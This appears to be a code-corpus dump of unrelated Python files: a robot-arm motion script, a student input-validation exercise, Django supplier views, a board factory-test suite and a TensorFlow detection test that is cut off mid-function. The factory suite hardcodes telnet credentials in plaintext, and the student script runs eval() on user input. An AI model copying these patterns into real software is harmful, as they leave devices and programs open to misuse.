ee93303355c66a20ff5ffdd32b3ebf107b00bc0e | f5f7a1ae04a999f3f193cca647397b29806edf73 | /0000_examples/ur3_dual_interpolation_exe.py | 09b091f802f3706ab9fd2e03f1068f6f58440932 | [
"MIT"
] | permissive | kazuki0824/wrs | bf88d1568f591c61870332436bfcd079d78b87d7 | 03c9e59779a30e2f6dedf2732ad8a46e6ac3c9f0 | refs/heads/main | 2023-07-24T05:20:02.054592 | 2021-05-31T14:38:18 | 2021-05-31T14:38:18 | 368,829,423 | 1 | 0 | MIT | 2021-05-19T10:25:48 | 2021-05-19T10:25:47 | null | UTF-8 | Python | false | false | 1,191 | py | import math
import numpy as np
import robot_con.ur.ur3_dual_x as u3r85dx
rbtx = u3r85dx.UR3DualX(lft_robot_ip='10.2.0.50', rgt_robot_ip='10.2.0.51', pc_ip='10.2.0.101')
# left randomization
current_lft_jnt_values = rbtx.lft_arm_hnd.get_jnt_values()
n_lft_jnt_values = (current_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_lft_jnt_values = (n_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_lft_jnt_values = (nn_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
# right randomization
current_rgt_jnt_values = rbtx.rgt_arm_hnd.get_jnt_values()
n_rgt_jnt_values = (current_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_rgt_jnt_values = (n_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_rgt_jnt_values = (nn_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
rbtx.move_jspace_path([current_lft_jnt_values + current_rgt_jnt_values,
n_lft_jnt_values + n_rgt_jnt_values,
nn_lft_jnt_values + nn_rgt_jnt_values,
nnn_lft_jnt_values + nnn_rgt_jnt_values], control_frequency=0.05) | [
"[email protected]"
] | |
1298229e6667d5b56fca496bd5b6d2adb592dec4 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_1/kdsjor001/question2.py | b192808bc1bd49a030995b7d46e982d2aaa24594 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | a=eval(input('Enter the hours:\n'))
b=eval(input('Enter the minutes:\n'))
c=eval(input('Enter the seconds:\n'))
if 0<=a<=23 and 0<=b<=59 and 0<=c<=59:
print ('Your time is valid.')
else:
print ('Your time is invalid.') | [
"[email protected]"
] | |
40f756004da71f05733139a24309c3462c7ec54b | 43d4b962a83dac734dfb09b8523fdfcfcc6628c1 | /lavajato_fornecedor/views.py | c245e3d77cf35444022eb95c2347a0cc74207d4f | [] | no_license | redcliver/sistemas | 01edd98c2814eee50550010169b2c7594e5256f5 | 1129c9516c57fbf53ce3cf5e0e5feb3835d3e9df | refs/heads/master | 2020-04-07T17:23:04.809752 | 2019-05-02T16:24:18 | 2019-05-02T16:24:18 | 158,567,651 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,460 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from .models import fornecedor
# Create your views here.
def lavajato_fornecedor(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
if request.method == 'POST' and request.POST.get('nome') != None:
name = request.POST.get('nome')
telefone = request.POST.get('tel')
celular = request.POST.get('cel')
cpf = request.POST.get('cpf')
email = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
novo_fornecedor = fornecedor(nome=name, telefone=telefone, celular=celular, cpf=cpf, email=email, endereco=endereco, numero=numero, bairro=bairro, cidade=cidade, uf_cidade=uf_cidade)
novo_fornecedor.save()
msg = name+" salvo com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor','msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor'})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def busca(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_visualiza.html', {'title':'Visualizar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca.html', {'title':'Buscar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def edita(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def salva(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
nome = request.POST.get('nome')
tel = request.POST.get('tel')
cel = request.POST.get('cel')
cpf = request.POST.get('cpf')
mail = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
bloqueado = request.POST.get('bloqueado')
fornecedor_obj.nome = nome
fornecedor_obj.telefone = tel
fornecedor_obj.celular = cel
fornecedor_obj.cpf = cpf
fornecedor_obj.email = mail
fornecedor_obj.endereco = endereco
fornecedor_obj.numero = numero
fornecedor_obj.bairro = bairro
fornecedor_obj.cidade = cidade
fornecedor_obj.uf_cidade = uf_cidade
fornecedor_obj.estado = bloqueado
fornecedor_obj.save()
msg = fornecedor_obj.nome + " editado(a) com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj, 'msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'}) | [
"[email protected]"
] | |
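These function-based views still need URL routes to be reachable; a hypothetical `urls.py` sketch (the route patterns are assumptions, using the pre-2.0 `url()` style this Django code base matches):

```python
from django.conf.urls import url
from lavajato_fornecedor import views

urlpatterns = [
    url(r'^fornecedor/novo/$', views.lavajato_fornecedor),
    url(r'^fornecedor/busca/$', views.busca),
    url(r'^fornecedor/edita/$', views.edita),
    url(r'^fornecedor/salva/$', views.salva),
]
```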
ac3a413222f1c781a87ae64071c11456543630e3 | 71764665e27f4b96bab44f38a4a591ffc2171c24 | /hhplt/productsuite/RD50C/auto_test1.py | 343f405b2ee4ee990bbf72e929d2d148330595b7 | [] | no_license | kingdomjc/RSU_production_VAT | 693f8c504acc0cc88af92942734ccb85f7e7d7c0 | 9a3d6d3f5a5edfaf30afdff725661630aafe434c | refs/heads/master | 2020-07-31T05:03:46.699606 | 2019-09-24T02:09:53 | 2019-09-24T02:09:53 | 210,491,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,235 | py | #encoding:utf-8
u'''Before testing at this station, first run the APP version download service program TFTPSRV.EXE on the test PC;
1. Connect the RSDB0 board under test via ribbon cable to the fixture's RSIB0 board (LED & PSAM card panel), to the test serial cable, and to the network via the Ethernet port;
2. Power on the RSDB0 board;
3. Press the reset button S1 on the board when prompted by VAT;
4. The panel LED test items require manual observation to judge how the panel LEDs behave.
'''
import socket
import serial
from hhplt.deviceresource.checkVersion import VersionManager
from hhplt.productsuite.RD50C import downloadEPLD
from hhplt.testengine.server import ServerBusiness
suiteName = u'''RSDB0单板功能测试工位'''
version = "1.0"
failWeightSum = 10 #整体不通过权值,当失败权值和超过此,判定测试不通过
import binascii
import os
import re
import telnetlib
from hhplt.deviceresource.RD50CAutoTestMyd import PsamProxy, DeviceProxy, RTCProxy, MACProxy, PCIEProxy
from hhplt.testengine.testcase import superUiLog, uiLog
from hhplt.testengine.exceptions import TestItemFailException,AbortTestException
from hhplt.deviceresource import RD50CDownloadNetMyd
import time
from hhplt.deviceresource import TestResource, askForResource
from hhplt.parameters import PARAM
import hhplt.testengine.manul as manul
from hhplt.testengine.manul import askForSomething, manulCheck
import manual_test
# Serial-port fixture open/close trigger
# Test function naming convention: T_<index>_<method name>
# _A means an automated test, _M a manual test; on normal completion the function returns its output data (may be empty); on failure it raises TestItemFailException, optionally with output
# The function docstring holds "<test name>-<description>"
# Two optional functions: setup(product) runs before every test (regardless of how many cases are selected); rollback(product) runs after the test fails (total fail weight exceeded)
def __checkManualFinished(idCode):
    '''Check that the "RSDB0 board power & BOOT download" station has already passed'''
with ServerBusiness(testflow = True) as sb:
status = sb.getProductTestStatus(productName="RD50C_RSU" ,idCode = idCode)
if status is None:
raise AbortTestException(message=u"RSDB0尚未进行单板测试,RSDB0单板功能测试终止")
else:
sn1 = downloadEPLD.suiteName
if sn1 not in status["suiteStatus"] or status["suiteStatus"][sn1] != 'PASS':
raise AbortTestException(message=u"RSDB0单板电源&BOOT下载测试项未进行或未通过,RSDB0单板功能测试终止")
def pingIPOpen(pingIP):
data = os.popen('ping %s' % pingIP).readlines()
print data
for line in data:
if re.search(r'TTL=', line, re.I):
return "ok"
return "no"
def __doorDog():
    sc = __askForPlateDeviceCom() # acquire the GS10PlateDevice resource
downNet = sc.doorDog()
return downNet
def __askForPlateDeviceCom():
    '''Acquire the fixture board resource'''
sc = askForResource('RD50CPlateDevice', RD50CDownloadNetMyd.GS10PlateDevice,
serialPortName = PARAM["defaultCOMPort"],
cableComsuption = 1)
return sc
def __downloadVersion():
    sc = __askForPlateDeviceCom() # acquire the GS10PlateDevice resource
versionFile = None
downNet = sc.downloadVersion(version_file=versionFile)
return downNet
def T_01_scanCode_A(product):
u'扫码条码-扫描条码'
barCode = askForSomething(u'扫描条码', u'请扫描RSDB0单板条码', autoCommit=False)
__checkManualFinished(barCode)
product.setTestingProductIdCode(barCode)
product.setTestingSuiteBarCode(barCode)
return {u"RSDB0单板条码": barCode}
def T_02_downloadNet1_A(product):
u'单板网口测试-RSDB0单板网口通信功能及APP版本下载测试'
retry = ""
t = 0
while True:
t += 1
powerResult = manulCheck(u'复位', u'%s请在点击确定按钮后,按下单板上的复位按键S1'%retry,check="ok")
if powerResult:
downNet = __downloadVersion()
if downNet == "OK":
return
elif downNet == "loginfail":
retry = "登录超时,请重新操作,"
if t == 2:
raise TestItemFailException(failWeight=10, message=u'串口无打印')
elif downNet == "TFTPfail":
# retry = "TFTP开启失败,请重新操作,"
# continue
raise TestItemFailException(failWeight=10, message=u'APP版本下载失败, 可能是没有打开TFTP')
else:
raise TestItemFailException(failWeight=10, message=u'BOOT下载失败,未知异常')
def myReadMac():
macoffset = 0x46
proxy = MACProxy(PARAM["defaultNetOneIp"])
try:
readMac = proxy.readEeprom(macoffset, 6)
macstrRead = ""
macstrRead += binascii.hexlify(readMac[0:1])
macstrRead += binascii.hexlify(readMac[1:2])
macstrRead += binascii.hexlify(readMac[2:3])
macstrRead += binascii.hexlify(readMac[3:4])
macstrRead += binascii.hexlify(readMac[4:5])
macstrRead += binascii.hexlify(readMac[5:6])
return macstrRead
except:
raise TestItemFailException(failWeight=10, message=u"读取mac失败,EEPROM测试失败")
finally:
proxy.close()
def myWriteMac(macstr):
macoffset = 0x46
proxy = MACProxy(PARAM["defaultNetOneIp"])
for i in range(25):
try:
print "读个看看%d" % i
proxy.initResource()
proxy.readEeprom(0x27, 12)
break
except:
time.sleep(10)
else:
proxy.close()
raise TestItemFailException(failWeight=10, message=u"建立连接失败,EEPROM测试失败")
try:
macLast = binascii.unhexlify(macstr)
proxy.writeEeprom(macoffset, macLast)
except:
raise TestItemFailException(failWeight=10, message=u"写入mac失败,EEPROM测试失败")
finally:
proxy.close()
def T_03_MACTest_A(product):
u'EEPROM测试-EEPROM读写测试'
myWriteMac("A1A1A1A1A1A1")
macstrRead2 = myReadMac()
if macstrRead2.upper() == "A1A1A1A1A1A1":
return {u"EEPROM测试":u"EEPROM读写成功"}
raise TestItemFailException(failWeight=10, message=u"写入与分配mac不一致,EEPROM测试失败")
def T_04_checkVersionTest_A(product):
u"查询版本号-查询版本号"
sc = VersionManager(PARAM["defaultNetOneIp"])
# sc = __askForCheckVersion()
try:
ret = sc.queryVersion()
except:
raise TestItemFailException(failWeight=1, message=u"版本获取失败")
finally:
sc.close()
if ret["sysRuning"] == 0:
sysVersion = ret["sys0VersionNum"]
sysStandby = ret["sys1VersionNum"]
else:
sysVersion = ret["sys1VersionNum"]
sysStandby = ret["sys0VersionNum"]
return{u"应用版本号":ret["appRuningVersionNum"],u"系统版本号":sysVersion,u"备用系统版本号":sysStandby}
def T_05_PSAMTest_A(product):
u'PSAM卡接口测试-RSDB0单板连接RSIB0单板进行4个PSAM卡接口测试'
errorList = []
# proxy = __askForRD50CNet1()
proxy = PsamProxy(PARAM["defaultNetOneIp"])
command = "00a4000002df01"
try:
for slot in range(4):
ack = proxy.active(slot)
if ack[0:4] != "e800":
superUiLog(u"PSAM卡槽[%d]激活失败"%(slot+1) + ack)
errorList.append(str(slot+1))
continue
else:
superUiLog(u"PSAM卡槽[%d]激活成功"%(slot+1) + ack[4:])
ackRead = proxy.exchangeApdu(slot, command)
if ackRead[0:4] != "e900":
uiLog(u"命令执行失败 " + ack)
else:
uiLog(u"命令执行成功 " + ack[4:])
finally:
proxy.close()
if errorList != []:
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u'PSAM卡槽%s激活失败' % ",".join(errorList))
return
def T_06_lightTest_M(protduct):
u"面板灯接口测试-RSDB0单板连接RSIB0单板进行单板面板灯接口测试"
LightDict = {"系统PWR":"长亮","系统RUN":"闪烁","系统SAM":"长亮"}
alist = []
for alight in LightDict:
lightResult = manulCheck(u"面板灯接口测试", u"请观察%s灯是否%s"%(alight,LightDict[alight]))
if lightResult:
continue
alist.append(alight)
# proxy = __askForRD50CLight()
proxy = DeviceProxy(PARAM["defaultNetOneIp"])
try:
epld_addr = int(str("da"), 16)
epld_value = int(str("0"), 16)
proxy._write_epld(epld_addr, epld_value)
redlightResult = manulCheck(u"系统报警灯", u"请观察系统ALM灯是否闪烁,点击正常后ALM灯将会关闭")
if redlightResult:
epld_addr1 = int(str("da"), 16)
epld_value1 = int(str("1"), 16)
proxy._write_epld(epld_addr1, epld_value1)
else:
alist.append("系统ALM")
epld_addr1 = int(str("da"), 16)
epld_value1 = int(str("1"), 16)
proxy._write_epld(epld_addr1, epld_value1)
time.sleep(0.5)
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("00"), 16)
proxy._write_epld(epld_addr1, epld_value1)
sixlightResult = manulCheck(u"led灯亮起提示", u"led灯ANT1-ANT6是否亮起,判断后会关闭led灯")
if sixlightResult:
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("3f"), 16)
proxy._write_epld(epld_addr1, epld_value1)
else:
alist.append("ANT1-ANT6灯")
epld_addr1 = int(str("17c"), 16)
epld_value1 = int(str("3f"), 16)
proxy._write_epld(epld_addr1, epld_value1)
finally:
proxy.close()
if alist:
cir = ",".join(alist)
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u"%s测试不正常" % cir)
return
def _T_07_PCIETest_A(product):
u"PCIE测试-PCIE测试"
proxy = PCIEProxy(PARAM["PCIEIp"])
try:
recvResult = proxy.sendPcie()
print recvResult
except:
raise TestItemFailException(failWeight=10, message=u"PCIE测试失败")
finally:
proxy.close()
def T_07_carDetection_A(protduct):
u"车检串口-车检串口"
proxy = DeviceProxy(PARAM["defaultNetOneIp"])
try:
epld_addr = int(str("d4"), 16)
epld_value = int(str("7"), 16)
proxy._write_epld(epld_addr, epld_value)
pullOutResult = manulCheck(u"提示", u"请再车检插口的工装接口插拔之后,点击确定")
if pullOutResult:
read_epld_addr = int(str("90"), 16)
readResult = proxy._read_epld(read_epld_addr)
readResult = hex(readResult)[2:]
print readResult
if readResult != "c0":
proxy.close()
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u"车检口测试失败,错误码%s"%readResult)
epld_addr1 = int(str("d2"),16)
epld_value1 = int(str("1"),16)
epld_value2 = int(str("0"),16)
proxy._write_epld(epld_addr1, epld_value1)
time.sleep(0.5)
proxy._write_epld(epld_addr1, epld_value2)
finally:
proxy.close()
def _T_08_serialPort_A(product):
u"串口测试-串口测试"
time.sleep(10)
ip1 = PARAM["defaultNetOneIp"]
tn = telnetlib.Telnet(ip1, port=23, timeout=10)
try:
tn.set_debuglevel(2)
tn.read_until('login: ')
tn.write('rsu_c\r')
tn.read_until('Password: ')
tn.write('shhic357\r')
tn.read_until("#")
tn.write('cat /dev/ttyS1 > myd.txt & \n')
tn.read_until("#")
se = serial.Serial(PARAM["serialPort"], 115200)
for i in range(4):
se.write("%s\n"%"mynameisco"*10)
time.sleep(2)
se.close()
tn.write("wc -l myd.txt\n")
b = tn.read_until("#", 4)
l = b.split("\n")[1].strip()[0]
print l
except:
raise AbortTestException(message=u"请检查工装连接是否正常")
finally:
tn.close()
# for i in l:
# if "4 myd.txt" in i:
# return {u"串口测试": u"成功"}
if int(l) > 0:
return {u"串口测试": u"成功,%s"%l}
else:
raise TestItemFailException(failWeight=10, message=u'串口测试失败')
def T_09_RTCTest_A(product):
u"RTC时钟测试-RSDB0单板RTC时钟时间设置测试"
setList =[]
tmList = []
timeNow = time.localtime()
set_year = int(timeNow[0])
set_mon = int(timeNow[1])
set_day = int(timeNow[2])
set_wday = int(timeNow[6])
set_hour = int(timeNow[3])
set_min = int(timeNow[4])
set_sec = int(timeNow[5])
proxy = RTCProxy(PARAM["defaultNetOneIp"])
try:
proxy.rtc_init()
proxy.rtc_set(set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec)
setList.extend((set_year,set_mon,set_day,set_wday,set_hour,set_min,set_sec))
ack = proxy.rtc_read()
except:
raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
finally:
proxy.close()
rtc_time = binascii.hexlify(ack)
ret = int(rtc_time[0:8], 16)
tm_sec = int(rtc_time[8:16], 16)
tm_min = int(rtc_time[16:24], 16)
tm_hour = int(rtc_time[24:32], 16)
tm_mday = int(rtc_time[32:40], 16)
tm_mon = int(rtc_time[40:48], 16)
tm_year = int(rtc_time[48:56], 16)
tm_wday = int(rtc_time[56:64], 16)
tmList.extend((tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec))
print "tmList",tmList
if ret == 0:
print "get rtc time: %d-%d-%d,%d,%d:%d:%d \r\n" % (tm_year, tm_mon, tm_mday, tm_wday, tm_hour, tm_min, tm_sec)
if setList == tmList:
return
else:
PARAM["failNum"] = "1"
raise TestItemFailException(failWeight=1, message=u'RTC时钟设置失败')
def T_10_doorDogTest_A(product):
u"看门狗测试-RSDB0单板硬件看门狗测试"
ip1 = PARAM["defaultNetOneIp"]
tn = telnetlib.Telnet(ip1, port=23, timeout=10)
try:
tn.set_debuglevel(2)
        # enter the login user name
        tn.read_until('login: ')
        tn.write('rsu_c\r')
        # enter the login password
        tn.read_until('Password: ')
        tn.write('shhic357\r')
        # after logging in, execute commands
tn.read_until("# ")
tn.write('ps\n')
psProcess = tn.read_until("/usr/bin/wtd")
pslist = psProcess.split("\n")
for oneProcess in pslist:
if "usr/bin/wtd" in oneProcess:
doorProcess = oneProcess.strip().split(" ")
break
else:
raise TestItemFailException(failWeight=10, message=u'没有喂狗进程')
tn.write("kill %s\n" % doorProcess[0])
time.sleep(2)
except:
raise TestItemFailException(failWeight=10, message=u'看门狗测试失败')
finally:
tn.close()
sc = __doorDog()
if sc == "ok":
return {u"看门狗测试":u"成功"}
else:
raise TestItemFailException(failWeight=10, message=u'看门狗失效')
| [
"[email protected]"
] | |
005465f20680fb4a6b902a62c9c1f39bd408de7d | 505b766aeef6dae5fdb2cab9f2550543179e10e9 | /app/keyvalue/models.py | ca70f4fd07e1a6862c13073c71802ea54c71b626 | [] | no_license | tossedwarrior/wri | 19b912630d00f64bcccc499ba22418c73c7bf359 | 0d4a0f9d7c36b04f87c7cf0ec42db4a57698137f | refs/heads/master | 2020-12-25T19:27:19.028235 | 2012-06-13T21:03:11 | 2012-06-13T21:03:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 837 | py | # -*- encoding: utf-8 -*-
import os
from datetime import datetime
if 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):
from django.db import models
class JSONData(models.Model):
json = models.TextField(default='[]')
@staticmethod
def get_by_id(id):
return JSONData.objects.get(pk=id)
def put(self):
self.save()
def unique_id(self):
return self.id
class Error(models.Model):
error = models.TextField(default='')
when = models.DateTimeField(default=datetime.now)
@staticmethod
def track(log):
Error(error=log).save();
@staticmethod
def latest():
return Error.objects.order_by('-when')[:10]
else:
from models_appengine import *
| [
"[email protected]"
] | |
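A small usage sketch of the `JSONData` wrapper above, exercising the Django branch (requires a configured Django environment; the JSON payload is an arbitrary placeholder):

```python
record = JSONData(json='{"name": "example"}')
record.put()                                    # persists via Django's save()
fetched = JSONData.get_by_id(record.unique_id())
print(fetched.json)
```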
ae069441f2d4ce8ad54d7f0570cef537641659eb | 5dd190725aaaeb7287d935b3c99c20480b208816 | /object_detection/dataset_tools/context_rcnn/generate_embedding_data_tf2_test.py | a93e9eacd9bc9e9e98402f6d60446363b8b6c604 | [
"MIT"
] | permissive | DemonDamon/mask-detection-based-on-tf2odapi | 32d947164fb54395b9e45368c0d4bcf3a6ea1c28 | 192ae544169c1230c21141c033800aa1bd94e9b6 | refs/heads/main | 2023-05-13T05:05:44.534885 | 2021-06-08T05:56:09 | 2021-06-08T05:56:09 | 369,463,131 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,488 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for generate_embedding_data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import tempfile
import unittest
import numpy as np
import six
import tensorflow as tf
from object_detection import exporter_lib_v2
from object_detection.builders import model_builder
from object_detection.core import model
from object_detection.protos import pipeline_pb2
from object_detection.utils import tf_version
if tf_version.is_tf2():
from object_detection.dataset_tools.context_rcnn import generate_embedding_data # pylint:disable=g-import-not-at-top
if six.PY2:
import mock # pylint: disable=g-import-not-at-top
else:
mock = unittest.mock
try:
import apache_beam as beam # pylint:disable=g-import-not-at-top
except ModuleNotFoundError:
pass
class FakeModel(model.DetectionModel):
def __init__(self, conv_weight_scalar=1.0):
super(FakeModel, self).__init__(num_classes=5)
self._conv = tf.keras.layers.Conv2D(
filters=1, kernel_size=1, strides=(1, 1), padding='valid',
kernel_initializer=tf.keras.initializers.Constant(
value=conv_weight_scalar))
def preprocess(self, inputs):
return tf.identity(inputs), exporter_lib_v2.get_true_shapes(inputs)
def predict(self, preprocessed_inputs, true_image_shapes):
return {'image': self._conv(preprocessed_inputs)}
def postprocess(self, prediction_dict, true_image_shapes):
with tf.control_dependencies(prediction_dict.values()):
num_features = 100
feature_dims = 10
classifier_feature = np.ones(
(2, feature_dims, feature_dims, num_features),
dtype=np.float32).tolist()
postprocessed_tensors = {
'detection_boxes': tf.constant([[[0.0, 0.1, 0.5, 0.6],
[0.5, 0.5, 0.8, 0.8]]], tf.float32),
'detection_scores': tf.constant([[0.95, 0.6]], tf.float32),
'detection_multiclass_scores': tf.constant([[[0.1, 0.7, 0.2],
[0.3, 0.1, 0.6]]],
tf.float32),
'detection_classes': tf.constant([[0, 1]], tf.float32),
'num_detections': tf.constant([2], tf.float32),
'detection_features':
tf.constant([classifier_feature],
tf.float32)
}
return postprocessed_tensors
def restore_map(self, checkpoint_path, fine_tune_checkpoint_type):
pass
def restore_from_objects(self, fine_tune_checkpoint_type):
pass
def loss(self, prediction_dict, true_image_shapes):
pass
def regularization_losses(self):
pass
def updates(self):
pass
@contextlib.contextmanager
def InMemoryTFRecord(entries):
temp = tempfile.NamedTemporaryFile(delete=False)
filename = temp.name
try:
with tf.io.TFRecordWriter(filename) as writer:
for value in entries:
writer.write(value)
yield filename
finally:
os.unlink(temp.name)
@unittest.skipIf(tf_version.is_tf1(), 'Skipping TF2.X only test.')
class GenerateEmbeddingData(tf.test.TestCase):
def _save_checkpoint_from_mock_model(self, checkpoint_path):
"""A function to save checkpoint from a fake Detection Model.
Args:
checkpoint_path: Path to save checkpoint from Fake model.
"""
mock_model = FakeModel()
fake_image = tf.zeros(shape=[1, 10, 10, 3], dtype=tf.float32)
preprocessed_inputs, true_image_shapes = mock_model.preprocess(fake_image)
predictions = mock_model.predict(preprocessed_inputs, true_image_shapes)
mock_model.postprocess(predictions, true_image_shapes)
ckpt = tf.train.Checkpoint(model=mock_model)
exported_checkpoint_manager = tf.train.CheckpointManager(
ckpt, checkpoint_path, max_to_keep=1)
exported_checkpoint_manager.save(checkpoint_number=0)
def _export_saved_model(self):
tmp_dir = self.get_temp_dir()
self._save_checkpoint_from_mock_model(tmp_dir)
output_directory = os.path.join(tmp_dir, 'output')
saved_model_path = os.path.join(output_directory, 'saved_model')
tf.io.gfile.makedirs(output_directory)
with mock.patch.object(
model_builder, 'build', autospec=True) as mock_builder:
mock_builder.return_value = FakeModel()
exporter_lib_v2.INPUT_BUILDER_UTIL_MAP['model_build'] = mock_builder
output_directory = os.path.join(tmp_dir, 'output')
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
exporter_lib_v2.export_inference_graph(
input_type='tf_example',
pipeline_config=pipeline_config,
trained_checkpoint_dir=tmp_dir,
output_directory=output_directory)
saved_model_path = os.path.join(output_directory, 'saved_model')
return saved_model_path
def _create_tf_example(self):
encoded_image = tf.io.encode_jpeg(
tf.constant(np.ones((4, 4, 3)).astype(np.uint8))).numpy()
def BytesFeature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def Int64Feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def FloatFeature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
example = tf.train.Example(
features=tf.train.Features(
feature={
'image/encoded': BytesFeature(encoded_image),
'image/source_id': BytesFeature(b'image_id'),
'image/height': Int64Feature(400),
'image/width': Int64Feature(600),
'image/class/label': Int64Feature(5),
'image/class/text': BytesFeature(b'hyena'),
'image/object/bbox/xmin': FloatFeature(0.1),
'image/object/bbox/xmax': FloatFeature(0.6),
'image/object/bbox/ymin': FloatFeature(0.0),
'image/object/bbox/ymax': FloatFeature(0.5),
'image/object/class/score': FloatFeature(0.95),
'image/object/class/label': Int64Feature(5),
'image/object/class/text': BytesFeature(b'hyena'),
'image/date_captured': BytesFeature(b'2019-10-20 12:12:12')
}))
return example.SerializeToString()
def assert_expected_example(self, example, topk=False, botk=False):
# Check embeddings
if topk or botk:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
218)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[2])
else:
self.assertEqual(len(
example.features.feature['image/embedding'].float_list.value),
109)
self.assertAllEqual(
example.features.feature['image/embedding_count'].int64_list.value,
[1])
self.assertAllEqual(
example.features.feature['image/embedding_length'].int64_list.value,
[109])
# Check annotations
self.assertAllClose(
example.features.feature['image/object/bbox/ymin'].float_list.value,
[0.0])
self.assertAllClose(
example.features.feature['image/object/bbox/xmin'].float_list.value,
[0.1])
self.assertAllClose(
example.features.feature['image/object/bbox/ymax'].float_list.value,
[0.5])
self.assertAllClose(
example.features.feature['image/object/bbox/xmax'].float_list.value,
[0.6])
self.assertAllClose(
example.features.feature['image/object/class/score']
.float_list.value, [0.95])
self.assertAllClose(
example.features.feature['image/object/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/object/class/text']
.bytes_list.value, [b'hyena'])
self.assertAllClose(
example.features.feature['image/class/label']
.int64_list.value, [5])
self.assertAllEqual(
example.features.feature['image/class/text']
.bytes_list.value, [b'hyena'])
# Check other essential attributes.
self.assertAllEqual(
example.features.feature['image/height'].int64_list.value, [400])
self.assertAllEqual(
